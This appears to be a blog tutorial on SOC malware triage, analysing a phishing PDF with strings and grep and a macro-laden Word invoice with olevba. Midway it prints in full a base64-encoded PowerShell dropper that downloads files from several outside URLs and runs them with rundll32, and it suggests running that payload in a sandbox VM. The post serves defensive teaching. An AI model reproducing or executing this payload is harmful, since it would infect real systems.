Cyber Defense SOC (Day-to-Day) Operations — Part 1 (Malware and IOC Extractions).

Hello Readers,

I Vighnesh Deep Sharan, a passionate blue-teamer, cyber-geek and learner would like to share my learnings of what potential situation a SOC Analyst can face into his/her day-to-day operations.

Consider you are working as a SOC Analyst and you have been assigned with a task that “Hey, this is a document that has been reported as a malicious doc, so can you examine and submit a report that whether the doc is malicious, or it is legit.”

So, before right away jumping into the end-to-end analysis a suggestion from my end. To perform such analysis, we should perform these actions in a suitable environment, and for malware analysis I would like to introduce a Debian Linux (Ubuntu distro) — Remnux (A Linux Toolkit for Malware Analysis).

Remnux OS is perfect for end-to-end malware analysis as it comes pre-loaded with all the possible tools required for malware analysis. You can straight away download the pre-configured VirtualBox image file and load it into your VMWare and can start playing with it.

Step 1— End-To-End Analysis of a Malicious PDF File.

So, a pdf file named — recent puchased.pdf file has been sent for us to examine and we are not sure what will happen if we simply execute or open that pdf file. So, let’s see without opening the malicious doc how can we examine the asset and come to a conclusion out of it.

Recent PDF Malicious pdf link —
https://app.any.run/tasks/0bf96bc2-041b-4918-9440-4fce9b160ae7/

Once you hit download from the above site a zip file will be downloaded, you have to un-zip and the password of the protected zip is “infected”.

Once zip is extracted you will see a pdf extracted. Refer this snapshot if you are following along.

We are planning not to open the pdf file as it infected so rather opening the file we going to pull it’s all ASCII printable characters so that we can draw some juicy information out of it, this can be done by passing the file using the “strings” command in Linux. Refer the snapshot provided below.

strings RecentPurchase.pdf

Some of the info has been revealed via strings command but that info is way too large, so we have to reduce that in order to identify pinpoint datapoints. This can be done via adding “less” flag to the strings command.

strings RecentPurchase.pdf | less

Refer the snapshot provided below after executing the “strings” command with the less flag.

Now we going to hunt for any external redirection or finding traces of any anonymous/ unknown entities within the file. In order to do so we going to find keywords within the file that is “http” using grep command that is also used for text and pattern matching.

strings RecentPurchase.pdf | grep http

So, our assumption was correct we are able to locate a completely fishy URL address embedded within the file. Refer the snapshot attached.

Conclusion: So, here we can stop and finally conclude that an attempt of Phishing was made which would redirect a user to this fake website through the pdf file.

Step 2— End-To-End Analysis of a Malicious Word Docx.

Since PDFs and Word docs (Invoice named) are used the most to target people. The process to investigate Word Docs that have embedded macros behind the doc is not as simple as investigating a simple phishing pdf.

Considering this exploit: Invoice-11_12_2020.661366072.doc

Once you open this malware in hybrid-analysis hit on the “Sample” button you sample.gz file will be downloaded. It will look something like this.

Now, we need to unzip the gzip the sample file and this can be done via command.

gzip -d 0aee2350aab11b452b864426d7e7f5735b06ed55c09429f0e0ab38015b8771ee.bin.sample.gz

Now, the sample file is ready we need to examine that and in order to do so we are going to use, a prebuilt tool called “olevba” — Olevba is a script to parse OLE and OpenXML files such as MS Office documents (e.g. Word, Excel), to detect VBA Macros, extract their source code in clear text, and detect security-related patterns such as auto-executable macros, suspicious VBA keywords used by malware, anti-sandboxing and anti-virtualization techniques, and potential IOCs (IP addresses, URLs, executable filenames, etc). It also detects and decodes several common obfuscation methods including Hex encoding, StrReverse, Base64, Dridex, VBA expressions, and extracts IOCs from decoded strings. XLM/Excel 4 Macros are also supported in Excel and SLK files.

olevba 0aee2350aab11b452b864426d7e7f5735b06ed55c09429f0e0ab38015b8771ee.bin.sample 

So, from olevba analysis we can say that when Document_open() is called that is doc is executed. Macros are Auto-Executed that is this doc is way too much dangerous to execute as it will automatically modify the target system.

Now, let’s see the hybrid analysis site and what it tells about this Invoice Word Doc and what it can offer to us.

We can clearly see that the Exploit is published in the site so then we going to use that to dig further.

Since the exploit pasted above is Base-64 Encoded and this can be determined by looking at Exploit. So, base-64 encodes start with Alphabet and ends with “=”.

Now, we will decode the Base-64 encoded exploit. This case be simply done by copying the exploit under echo and running the base64 command.

echo IABzAEUAVAAtAEkAdABlAE0AIAB2AGEAUgBJAGEAYgBsAGUAOgBDAFkAUgBkACAAIAAoACAAIABbAFQAWQBQAEUAXQAoACIAewA0AH0AewAwAH0AewAxAH0AewAyAH0AewAzAH0AewA1AH0AIgAgAC0ARgAgACcATQAuACcALAAnAEkATwAnACwAJwAuACcALAAnAGQAaQByAGUAQwBUACcALAAnAHMAeQBzAHQAZQAnACwAJwBvAHIAeQAnACkAIAApACAAIAA7ACAAcwBlAFQALQBJAFQARQBNACAAKAAiAFYAYQBSAGkAIgArACIAYQBCAEwAZQA6ACIAKwAiAGEAMABsAHEATgAiACkAIAAgACgAIAAgAFsAdABZAFAARQBdACgAIgB7ADMAfQB7ADUAfQB7ADcAfQB7ADQAfQB7ADEAfQB7ADIAfQB7ADYAfQB7ADAAfQAiACAALQBGACAAJwBHAEUAcgAnACwAJwBwAE8AJwAsACcAaQBOAFQAbQBhAE4AJwAsACcAcwBZACcALAAnAGkAYwBlACcALAAnAFMAVABFAE0ALgBuAEUAVAAnACwAJwBBACcALAAnAC4AcwBlAFIAdgAnACkAIAApACAAIAA7ACAAJABLAHUAcwB0AHoAOQB6AD0AKAAoACcAUQAnACsAJwAyAGwAJwApACsAKAAnAG4ANABtACcAKwAnADIAJwApACkAOwAkAEEAMgBmAGIAZgBwAHEAPQAkAFIAcQAzAHMAegA5ADMAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE0AbgAzAHYAMABtAHgAOwAkAFkAdwB4AHYAOQA5AGoAPQAoACcATAAnACsAKAAnAHoAegAnACsAJwA1ACcAKQArACgAJwA5ACcAKwAnAGYAeAAnACkAKQA7ACAAIAAoACAAIAB2AGEAcgBpAGEAQgBMAGUAIABDAHkAUgBEACAAIAApAC4AdgBBAGwAdQBlADoAOgAiAGMAUgBFAGAAQQBgAFQAYABFAEQAaQByAGAAZQBjAHQAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBQAGUAMwBtACcAKwAnAHYAJwArACcAaQB0AHsAMAB9AEsAJwArACgAJwA5AHQAJwArACcAYQAnACkAKwAoACcAcQA1ACcAKwAnADQAJwApACsAJwB7ACcAKwAnADAAfQAnACkAIAAtAGYAWwBDAEgAYQByAF0AOQAyACkAKQA7ACQARQBsAG0AYQBiAGwANgA9ACgAKAAnAFUAJwArACcANwBiAG0AJwApACsAJwBmACcAKwAnAGUAZQAnACkAOwAgACgAbABzACAAIAAoACIAVgBhAHIAaQAiACsAIgBBAGIATABlADoAIgArACIAYQAwAEwAUQBOACIAKQAgACAAKQAuAHYAQQBMAFUAZQA6ADoAIgBzAGAARQBjAGAAVQByAGAAaQB0AFkAUABSAG8AdABPAEMATwBsACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABEAGUAcABnADEAZgBrAD0AKAAnAEUAZAAnACsAKAAnAGIAYQBpACcAKwAnADkAegAnACkAKQA7ACQAVgBfADMAZwBzAHIAbQAgAD0AIAAoACgAJwBUADEAJwArACcAbwB4ACcAKQArACgAJwBfACcAKwAnAHcAZgAnACkAKQA7ACQAVQBmADQAYgA3ADkAdAA9ACgAJwBQAG4AJwArACgAJwAxACcAKwAnADQAMQAnACkAKwAnAHEAbQAnACkAOwAkAEEAdwA1ADkAagA2AGoAPQAoACgAJwBGADIAJwArACcAdwBwADEAJwApACsAJwByAGwAJwApADsAJABRAGUAbwBuAHcAcgBqAD0AJABIAE8ATQBFACsAKAAoACgAJwB0ACcAKwAnAEQANAAnACkAKwAnAFAAZQAnACsAKAAnADMAJwArACcAbQB2AGkAJwApACsAKAAnAHQAdABEACcAKwAnADQASwA5AHQAYQAnACsAJwBxACcAKQArACcANQAnACsAKAAnADQAdABEACcAKwAnADQAJwApACkALgAiAFIAYABFAFAAbABBAGMAZQAiACgAKABbAGMASABBAFIAXQAxADEANgArAFsAYwBIAEEAUgBdADYAOAArAFsAYwBIAEEAUgBdADUAMgApACwAJwBcACcAKQApACsAJABWAF8AMwBnAHMAcgBtACsAKAAoACcALgBkACcAKwAnAGwAJwApACsAJwBsACcAKQA7ACQAWgA1AHAAdgBuAGoANgA9ACgAKAAnAFAAMgAnACsAJwBwACcAKQArACcANwAnACsAKAAnAGkAJwArACcANwB2ACcAKQApADsAJABKADQANQBmAGYANQBnAD0ATgBFAGAAdwBgAC0ATwBCAGoARQBjAFQAIABOAEUAdAAuAFcARQBiAEMAbABpAEUATgBUADsAJABBAHoAOABuAHMAcgBkAD0AKAAoACgAJwBoACcAKwAnAHQAdAAnACkAKwAoACgAJwBwAHMAOgApACcAKwAnACgAJwApACkAKwAoACgAJwApACcAKwAnAFcATgAnACsAJwApACgAKQAoACcAKQApACsAJwApACcAKwAnAFcATgAnACsAJwApACcAKwAoACgAJwAoACcAKwAnAGgAJwArACcAcgAuAGQAaQBnAGkAbQBhACcAKwAnAHgALgBjACcAKwAnAG8ALgB1ACcAKQApACsAKAAoACcAawApACcAKQApACsAJwAoACkAJwArACcAVwBOACcAKwAoACgAJwApACgAZQAnACsAJwA5ADMAJwArACcAdAAnACsAJwB0AHYAZwAnACkAKQArACcAdQAnACsAKAAnAGYALgAnACsAJwBwAGQAZgBAAGgAdAAnACsAJwB0ACcAKQArACcAcABzACcAKwAoACgAJwA6ACcAKwAnACkAKAApAFcAJwApACkAKwAoACgAJwBOACcAKwAnACkAKAApACgAKQBXAE4AJwArACcAKQAoACcAKwAnAGUAJwApACkAKwAnAGQAdQAnACsAJwBjACcAKwAnAGEAJwArACgAJwB0ACcAKwAnAGkAbwAnACkAKwAoACcAbgAwADEALgAnACsAJwBzAHUAdAAnACsAJwBvACcAKQArACgAJwB3ACcAKwAnAGUAYgAuACcAKQArACcAYwAnACsAKAAoACcAbwBtACcAKwAnACkAJwApACkAKwAoACcAKAApACcAKwAnAFcATgAnACkAKwAoACgAJwApACgAZwAnACsAJwBtAHQAJwArACcANgBzADAAbwAnACkAKQArACgAJwAuAHoAJwArACcAaQAnACkAKwAoACcAcABAAGgAdAB0ACcAKwAnAHAAJwApACsAJwBzACcAKwAoACgAJwA6ACkAKAApAFcATgAnACsAJwApACcAKQApACsAJwAoACcAKwAnACkAJwArACcAKAAnACsAKAAoACcAKQBXACcAKQApACsAKAAoACcATgApACcAKwAnACgAdwAnACkAKQArACcAZQBiACcAKwAnAC4AYQAnACsAJwBuACcAKwAnAGEAdAAnACsAJwBvAG0AJwArACgAJwB5ACcAKwAnAC4AbwAnACkAKwAnAHIAJwArACcAZwAuACcAKwAoACgAJwB6AGEAJwArACcAKQAoACkAVwAnACkAKQArACcATgAnACsAKAAoACcAKQAoACcAKwAnAHcAbAAnACkAKQArACgAJwAwACcAKwAnADEAZQByADEAbAAnACsAJwA4ACcAKQArACgAJwAuAHoAJwArACcAaQBwACcAKwAnAEAAaAB0AHQAJwApACsAJwBwADoAJwArACcAKQAnACsAKAAnACgAKQBXACcAKwAnAE4AJwApACsAKAAoACcAKQAoACkAJwArACcAKAApAFcAJwArACcATgApACcAKQApACsAJwAoACcAKwAoACcAZQAnACsAJwByAHAAJwArACcALgBpAGwAdABlACcAKQArACgAKAAnAGMALgAnACsAJwBjAG8AKQAnACsAJwAoACkAJwApACkAKwAoACgAJwBXAE4AJwArACcAKQAnACkAKQArACcAKAAnACsAJwBwAHMAJwArACgAJwBoACcAKwAnAHAAbQAnACkAKwAnADgAJwArACcALgByACcAKwAoACcAYQByACcAKwAnAEAAJwApACsAKAAnAGgAJwArACcAdAB0AHAAJwApACsAJwBzADoAJwArACcAKQAnACsAKAAoACcAKAAnACsAJwApAFcATgApACcAKQApACsAKAAoACcAKAApACcAKwAnACgAKQBXAE4AJwArACcAKQAoACcAKQApACsAKAAnAGUAcwAnACsAJwB0AGUAcgAnACkAKwAoACcAbgAnACsAJwBpAC4AZwAnACkAKwAoACcAcgBhACcAKwAnAHQAaQBhACcAKQArACcAZQB0ACcAKwAnAHMAJwArACcAYQBsACcAKwAnAHUAJwArACgAJwBzAC4AaQAnACsAJwB0ACcAKQArACcAKQAnACsAKAAoACcAKAApACcAKwAnAFcATgApACcAKQApACsAKAAoACcAKABvADUAJwArACcAcAAnACkAKQArACcAaQB4ACcAKwAnAGkAJwArACgAJwAuAHAAJwArACcAZAAnACkAKwAoACcAZgBAAGgAJwArACcAdAB0ACcAKQArACgAKAAnAHAAcwA6ACkAKAAnACsAJwApAFcAJwArACcATgApACgAJwApACkAKwAoACgAJwApACcAKwAnACgAKQAnACkAKQArACgAKAAnAFcAJwArACcATgApACgAJwApACkAKwAnAGgAZQAnACsAKAAoACcAbABlAG4AJwArACcAYQAnACsAJwBvAGYAaQBjACcAKwAnAGkAYQAnACsAJwBsAC4AYwBvAG0AKQAoACcAKQApACsAJwApACcAKwAnAFcATgAnACsAKAAoACcAKQAoACcAKwAnAGwANAAnACkAKQArACgAJwBiACcAKwAnAGcAZwBsAC4AcABkAGYAJwArACcAQAAnACkAKwAoACgAJwBoAHQAdAAnACsAJwBwADoAJwArACcAKQAoACkAJwArACcAVwBOACkAKAApACcAKQApACsAKAAoACcAKAAnACsAJwApAFcATgApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwBwACcAKwAoACcAYQBjAGUAYwAnACsAJwBhACcAKQArACcAbQAnACsAKAAoACcAcAAuACcAKwAnAGkAbgApACcAKQApACsAKAAoACcAKAApAFcATgAnACsAJwApACgAJwApACkAKwAoACcAaAAzACcAKwAnADgAawBpADgAagAnACkAKwAnAGsAJwArACcAegAnACsAJwAuACcAKwAnAHAAZAAnACsAJwBmAEAAJwArACcAaAAnACsAJwB0ACcAKwAnAHQAJwArACcAcAA6ACcAKwAnACkAJwArACgAKAAnACgAKQBXAE4AJwArACcAKQAnACsAJwAoACcAKQApACsAKAAoACcAKQAoACcAKwAnACkAJwApACkAKwAnAFcATgAnACsAKAAoACcAKQAnACsAJwAoAHMAJwArACcAYQByAGEAbQBvACcAKQApACsAKAAnAG4AaQBjAC4AbQBlACcAKwAnAGQAJwApACsAKAAnAGkAJwArACcAYQBkAG8AJwApACsAKAAnAHQAJwArACcALgBoACcAKQArACcAdQAnACsAKAAoACcAKQAoACcAKQApACsAKAAoACcAKQBXACcAKwAnAE4AKQAoACcAKQApACsAJwBiACcAKwAoACcANgB6AGkAYwAnACsAJwBuACcAKwAnAC4AJwApACsAKAAnAHoAJwArACcAaQBwACcAKQApACkALgAiAHIAZQBQAGwAYABBAGMARQAiACgAKAAoACgAKAAnACkAJwArACcAKAApAFcAJwApACkAKwAoACgAJwBOACcAKwAnACkAKAAnACkAKQApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAGgAJwArACcAdwBlACcAKQApAFsAMABdACkALgAiAFMAUABMAGAAaQBUACIAKAAkAEsAbgB3AG4ANABoAG4AIAArACAAJABBADIAZgBiAGYAcABxACAAKwAgACQAWAAwADUAZgBtAGQAdwApADsAJABCAGgANQA4AGIAMgB5AD0AKAAnAFQAdgAnACsAJwBuAHQAJwArACgAJwBwAG8AJwArACcAdwAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATwBfADUAbABkADAAbwAgAGkAbgAgACQAQQB6ADgAbgBzAHIAZAAgAHwAIABzAG8AYABSAHQALQBgAE8AYgBqAGAAZQBgAGMAdAAgAHsAZwBgAGUAdABgAC0AcgBhAG4AZABgAG8ATQB9ACkAewB0AHIAeQB7ACQASgA0ADUAZgBmADUAZwAuACIARABPAGAAdwBOAGwATwBBAGQAYABGAEkATABlACIAKAAkAE8AXwA1AGwAZAAwAG8ALAAgACQAUQBlAG8AbgB3AHIAagApADsAJABEAGwAYgBtADcAMAAxAD0AKAAoACcATQByAHoAcAAnACsAJwBwACcAKQArACcAegA5ACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABRAGUAbwBuAHcAcgBqACkALgAiAEwAZQBgAE4AYABHAFQAaAAiACAALQBnAGUAIAAzADkAOQAxADYAKQAgAHsAJgAoACcAcgB1AG4AJwArACcAZABsAGwAMwAyAC4AJwArACcAZQAnACsAJwB4AGUAJwApACAAJABRAGUAbwBuAHcAcgBqACwAMAA7ACQASQA1AGIAYgB6AGoAeAA9ACgAJwBWAHcAJwArACcAaAAnACsAKAAnADYAJwArACcANQB0AHMAJwApACkAOwBiAHIAZQBhAGsAOwAkAE4AYQBhAGMAagBpAGQAPQAoACcAQgBxACcAKwAoACcAdQBjACcAKwAnAGoAbgBjACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABXAHAAZAB2AHYAagBxAD0AKAAoACcASwB5ACcAKwAnAGIAbQBzACcAKQArACcAOQB4ACcAKQA= | base64 -d

From the above exploit decoded we observe few important keywords such as sET-IteM vaRIable, NE`w`-OBjEcT NEt.WEbCliENT indicates that this is a PowerShell Exploit.

Now, since the Base-64 decoded exploit is de-obfuscated so in order to dig down the exploit we have to actually run the exploit in a Sandboxed Windows VM. Disable the Network bridge of the VM so that the machine remains unaffected.

Open PowerShell ISE and paste the de-obfuscated exploit and run it.

Now we will retrieve all the variables using the PowerShell command “ Get-Variable”

Get-Variable

Variable “Az8nsrd” has caught my attention that it holds various external random URLS with various resources associated (zip,rar,pdf) that has been embedded into the malicious Invoice document that make changes into the target machine.

Let’s take a dive at this particular variable name and see what it holds.

Get-Variable -Name Az8nsrd | fl

fl: means to get output in a “formatted list” in a structured manner.

So, thus our final conclusion is that once the doc is executed at the target system the Auto Execution of Macros take place and these macros are pointed to these unknown URLs with malicious resources associated to it that are getting executed once the document_open() is called.

In my next writeup we going to see how basically we can perform malicious network traffic analysis via Open-Source Framework called “Zeek”.

Thanks for Reading,

Stay Tuned!!

Ok till then — Happy Hacking!!